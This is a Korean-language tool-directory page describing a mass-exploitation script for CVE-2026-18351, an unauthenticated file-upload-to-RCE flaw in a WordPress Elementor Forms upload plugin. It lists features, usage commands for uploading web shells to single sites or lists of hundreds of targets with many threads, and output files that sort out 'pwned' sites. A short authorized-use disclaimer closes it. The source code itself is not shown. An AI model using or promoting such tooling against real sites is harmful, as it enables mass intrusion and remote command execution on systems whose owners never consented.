Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-18351 — CVE-2026-18351에 대한 대량 익스플로잇 도구로, Elementor Forms <= 1.6.0에서 인증되지 않은 임의 파일 업로드를 통한 RCE를 수행하며, 패시브 프로빙, 셸 업로드, 명령 실행 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
Vulnerability ScannersExploitationScripting & AutomationWeb Application ExploitationWeb SecurityPenetration TestingRemote Access ToolPayload Development
GitHubjohenlastgen-jlg/cve-2026-18351

CVE-2026-18351

CVE-2026-18351에 대한 대량 익스플로잇 도구로, Elementor Forms <= 1.6.0에서 인증되지 않은 임의 파일 업로드를 통한 RCE를 수행하며, 패시브 프로빙, 셸 업로드, 명령 실행 기능을 제공합니다.

저장소 보기
16시간 29분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-18351

CVE-2026-18351에 대한 대량 익스플로잇 도구 — Drag and Drop File Upload for Elementor Forms <= 1.6.0의 인증되지 않은 임의 파일 업로드 → RCE.

credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect


기능

  • 수동적 취약점 프로브 (업로드 없음)
  • 셸 업로드 및 RCE 확인을 포함한 전체 익스플로잇 모드
  • 단일 대상 및 대량 대상 지원
  • 멀티스레드 지원
  • 구성 가능한 명령 실행
  • 전체 로그, 취약점만, pwned만 출력 파일
  • 요청 타임아웃 구성

요구 사항

외부 의존성 없음 — Python 표준 라이브러리만 사용합니다.

root@kitploit:~
python3 --version  # 3.6+

사용법

root@kitploit:~
# 단일 대상 — 수동적 검사만 (업로드 없음)
python3 mass.py --url http://target.com --check

# 단일 대상 — 기본 명령(id)으로 익스플로잇
python3 mass.py --url http://target.com --cmd id

# 단일 대상 — 사용자 지정 명령으로 익스플로잇
python3 mass.py --url http://target.com --cmd whoami

# 대량 대상 — 수동적 검사
python3 mass.py --list targets.txt --threads 50 --check

# 대량 대상 — 익스플로잇
python3 mass.py --list targets.txt --threads 50 --cmd id

# 대량 대상 — 타임아웃 조정을 통한 익스플로잇
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# 전체 로그 저장
python3 mass.py --list targets.txt --output results.txt

# 취약한 대상만 저장
python3 mass.py --list targets.txt --output-vuln vuln.txt

# RCE가 확인된 대상만 저장
python3 mass.py --list targets.txt --output-pwned pwned.txt

# 결합 출력
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

옵션

옵션설명
--url단일 대상 URL
--list FILE대상 URL이 포함된 파일 (한 줄에 하나씩)
--check수동적 프로브만 — 파일 업로드 없음
--cmd CMD셸에서 실행할 명령 (기본값: id)
--threads N동시 스레드 수 (기본값: 20)
--timeout N요청당 타임아웃(초) (기본값: 10)
--output FILE전체 로그를 파일에 저장
--output-vuln FILE취약한 대상 URL만 파일에 저장
--output-pwned FILERCE가 확인된 대상만 파일에 저장

출력 상태

상태의미
PWNED셸 업로드 및 RCE 확인됨
VULN-NO-EXEC업로드가 수락되었으나 셸 실행 실패
PATCHED업로드가 거부되었거나 nonce를 찾을 수 없음
ERROR네트워크 또는 파싱 실패

targets.txt 형식

한 줄에 URL 하나. #로 시작하는 줄은 무시됩니다.

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

면책 조항

이 프로젝트는 승인된 보안 평가, 방어적 보안 연구, 취약점 검증 목적으로만 제공됩니다.

이 소프트웨어를 사용함으로써 귀하는 대상 시스템을 평가할 명시적 권한이 있음을 확인합니다. 컴퓨터 시스템에 대한 무단 접근은 금지되며 관련 법률을 위반할 수 있습니다.

저자와 기여자는 이 프로젝트의 무단 사용을 장려하거나 용인하지 않으며, 그 사용으로 인해 발생하는 모든 오용, 손해 또는 법적 결과에 대해 어떠한 책임도 지지 않습니다.


저자

JohenLastGen — JLG NETWORK

도구 다운로드